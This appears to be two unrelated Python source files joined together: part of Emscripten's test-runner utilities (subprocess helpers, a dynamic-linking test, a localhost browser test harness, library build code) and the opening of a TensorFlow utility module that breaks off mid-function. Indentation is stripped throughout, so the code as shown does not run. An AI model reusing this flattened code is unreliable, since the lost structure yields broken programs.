# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
print(e.stdout)
print(e.stderr)
self.fail(f'subprocess exited with non-zero return code({e.returncode}): `{shared.shlex_join(cmd)}`')
def emcc(self, filename, args=[], output_filename=None, **kwargs):
cmd = [compiler_for(filename), filename] + self.get_emcc_args(ldflags='-c' not in args) + args
if output_filename:
cmd += ['-o', output_filename]
self.run_process(cmd, **kwargs)
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_file('libb.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc() {
afunc("b");
}
''')
create_file('libc.c', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', '32mb')
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so, '-sSIDE_MODULE'] + self.get_emcc_args()
cmdv += linkto
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.c', ['liba' + so])
ccshared('libc.c', ['liba' + so])
self.set_setting('MAIN_MODULE')
extra_args = ['-L.', 'libb' + so, 'libc' + so]
do_run(r'''
#ifdef __cplusplus
extern "C" {
#endif
void bfunc();
void cfunc();
#ifdef __cplusplus
}
#endif
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n', emcc_args=extra_args)
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc_ptr)(), (*cfunc_ptr)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_NOW|RTLD_GLOBAL);
assert(cdso != NULL);
bfunc_ptr = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc_ptr != NULL);
cfunc_ptr = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc_ptr != NULL);
bfunc_ptr();
cfunc_ptr();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self):
for engine in self.js_engines:
assert engine in config.JS_ENGINES, "js engine does not exist in config.JS_ENGINES"
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in self.js_engines if engine and engine[0] not in banned]
def do_run(self, src, expected_output=None, force_c=False, **kwargs):
if 'no_build' in kwargs:
filename = src
else:
if force_c:
filename = 'src.c'
else:
filename = 'src.cpp'
write_file(filename, src)
return self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
return self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
return self._build_and_run(filename, read_file(expected_output_filename), **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
srcfile = test_file(*path)
out_suffix = kwargs.pop('out_suffix', '')
outfile = shared.unsuffixed(srcfile) + out_suffix + '.out'
expected = read_file(outfile)
return self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
no_build=False,
libraries=[],
includes=[],
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True, force_c=False, emcc_args=[],
interleaved_output=True,
regex=False,
output_basename=None):
logger.debug(f'_build_and_run: {filename}')
if no_build:
js_file = filename
else:
js_file = self.build(filename, libraries=libraries, includes=includes,
force_c=force_c, emcc_args=emcc_args,
output_basename=output_basename)
self.assertExists(js_file)
engines = self.filtered_js_engines()
if len(engines) > 1 and not self.use_all_engines:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
if not self.wasm_engines:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += self.wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.replace_suffix(js_file, '.wasm.c')
executable = shared.replace_suffix(js_file, '.exe')
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % config.EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode,
interleaved_output=interleaved_output)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all or len(expected_output) == 1:
for o in expected_output:
if regex:
self.assertTrue(re.search(o, js_output), 'Expected regex "%s" to match on:\n%s' % (regex, js_output))
else:
self.assertContained(o, js_output)
else:
if regex:
match_any = any(re.search(o, js_output) for o in expected_output)
self.assertTrue(match_any, 'Expected at least one of "%s" to match on:\n%s' % (expected_output, js_output))
else:
self.assertContained(expected_output, js_output)
if assert_returncode == 0 and check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
return js_output
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + test_file('third_party/freetype/include'),
'-I' + test_file('third_party/poppler/include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self, cmake):
assert cmake or not WINDOWS, 'on windows, get_zlib_library only supports cmake'
old_args = self.emcc_args.copy()
# inflate.c does -1L << 16
self.emcc_args.append('-Wno-shift-negative-value')
# adler32.c uses K&R sytyle function declarations
self.emcc_args.append('-Wno-deprecated-non-prototype')
# Work around configure-script error. TODO: remove when
# https://github.com/emscripten-core/emscripten/issues/16908 is fixed
self.emcc_args.append('-Wno-pointer-sign')
if cmake:
rtn = self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=['cmake', '.'],
make=['cmake', '--build', '.', '--'],
make_args=[])
else:
rtn = self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
self.emcc_args = old_args
return rtn
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(read_binary(test_file('browser_harness.html')))
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url.encode('utf-8'))
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class Reporting(Enum):
"""When running browser tests we normally automatically include support
code for reporting results back to the browser. This enum allows tests
to decide what type of support code they need/want.
"""
NONE = 0
# Include the JS helpers for reporting results
JS_ONLY = 1
# Include C/C++ reporting code (REPORT_RESULT mactros) as well as JS helpers
FULL = 2
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.also_wasm2js = int(os.getenv('EMTEST_BROWSER_ALSO_WASM2JS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
if not has_browser() or EMTEST_BROWSER == 'node':
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
'http://localhost:%s/%s' % (self.port, html_file),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
output = unquote(output)
try:
self.assertContained(expectedResult, output)
except Exception as e:
if extra_tries > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
reporting = read_file(test_file('browser_reporting.js'))
write_file('reftest.js', '''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
/** @suppress {uselessCode} */
function setupRefTest() {
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
/** @suppress{checkTypes} */
window.requestAnimationFrame = function(func) {
return realRAF(function() {
func();
realRAF(doReftest);
});
};
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
}
setupRefTest();
''' % (reporting, basename, int(manually_trigger)))
def compile_btest(self, args, reporting=Reporting.FULL):
# Inject support code for reporting results. This adds an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-sIN_TEST_HARNESS']
if reporting != Reporting.NONE:
# For basic reporting we inject JS helper funtions to report result back to server.
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'--pre-js', test_file('browser_reporting.js')]
if reporting == Reporting.FULL:
# If C reporting (i.e. REPORT_RESULT macro) is required
# also compile in report_result.c and forice-include report_result.h
args += ['-I' + TEST_ROOT,
'-include', test_file('report_result.h'),
test_file('report_result.c')]
if EMTEST_BROWSER == 'node':
args.append('-DEMTEST_NODE')
self.run_process([EMCC] + self.get_emcc_args() + args)
def btest_exit(self, filename, assert_returncode=0, *args, **kwargs):
"""Special case of btest that reports its result solely via exiting
with a given result code.
In this case we set EXIT_RUNTIME and we don't need to provide the
REPORT_RESULT macro to the C code.
"""
self.set_setting('EXIT_RUNTIME')
assert('reporting' not in kwargs)
assert('expected' not in kwargs)
kwargs['reporting'] = Reporting.JS_ONLY
kwargs['expected'] = 'exit:%d' % assert_returncode
return self.btest(filename, *args, **kwargs)
def btest(self, filename, expected=None, reference=None,
reference_slack=0, manual_reference=False, post_build=None,
args=None, message='.', also_proxied=False,
url_suffix='', timeout=None, also_wasm2js=False,
manually_trigger_reftest=False, extra_tries=1,
reporting=Reporting.FULL):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
if args is None:
args = []
original_args = args
args = args.copy()
if not os.path.exists(filename):
filename = test_file(filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(test_file(reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args += ['--pre-js', 'reftest.js', '-sGL_TESTING']
outfile = 'test.html'
args += [filename, '-o', outfile]
# print('all args:', args)
try_delete(outfile)
self.compile_btest(args, reporting=reporting)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
if EMTEST_BROWSER == 'node':
self.js_engines = [config.NODE_JS]
self.node_args += ['--experimental-wasm-threads', '--experimental-wasm-bulk-memory']
output = self.run_js('test.js')
self.assertContained('RESULT: ' + expected[0], output)
else:
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in original_args and (also_wasm2js or self.also_wasm2js):
print('WASM=0')
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['-sWASM=0'], message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-sGL_TESTING'], message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure,
make,
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = test_file(name.replace('_native', ''))
project_dir = Path(build_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
# Useful in debugging sometimes to comment this out, and two lines above
shutil.copytree(source_dir, project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = os.environ.copy()
env.update(env_init)
if not native:
# Inject emcmake, emconfigure or emmake accordingly, but only if we are
# cross compiling.
if configure:
if configure[0] == 'cmake':
configure = [EMCMAKE] + configure
else:
configure = [EMCONFIGURE] + configure
else:
make = [EMMAKE] + make
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EMTEST_BUILD_VERBOSE < 2 else None
stderr = err if EMTEST_BUILD_VERBOSE < 1 else None
shared.run_process(configure, env=env, stdout=stdout, stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
print('-- configure stdout --')
print(read_file(Path(project_dir, 'configure_out')))
print('-- end configure stdout --')
print('-- configure stderr --')
print(read_file(Path(project_dir, 'configure_err')))
print('-- end configure stderr --')
raise
# if we run configure or cmake we don't then need any kind
# of special env when we run make below
env = None
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EMTEST_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EMTEST_BUILD_VERBOSE < 2 else None
stderr = make_err if EMTEST_BUILD_VERBOSE < 1 else None
shared.run_process(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, read_binary(f)))
return generated_libs
|
tf_util.py
|
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(grads, var_list, clip_norm=None):
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
self.shapes = list(map(var_shape, var_list))
self.total_size = np.sum([intprod(shape) for shape in self.shapes])
self.var_list = var_list
def __call__(self, theta):
start = 0
for (shape, v) in zip(self.shapes, self.var_list):
size = intprod(shape)
v.assign(tf.reshape(theta[start:start + size], shape))
start += size
class GetFlat(object):
def __init__(self, var_list):
self.var_list = var_list
def __call__(self):
return tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in self.var_list]).numpy()
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# ================================================================
# Shape adjustment for feeding into tf tensors
# ================================================================
def adjust_shape(input_tensor, data):
'''
adjust shape of the data to the shape of the tensor if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
input_tensor tensorflow input tensor
data input data to be (potentially) reshaped to be fed into input
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
input_shape = [x or -1 for x in input_tensor.shape.as_list()]
assert _check_shape(input_shape, data.shape), \
'Shape of data {} is not compatible with shape of the input {}'.format(data.shape, input_shape)
return np.reshape(data, input_shape)
def _check_shape(input_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
squeezed_input_shape = _squeeze_shape(input_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
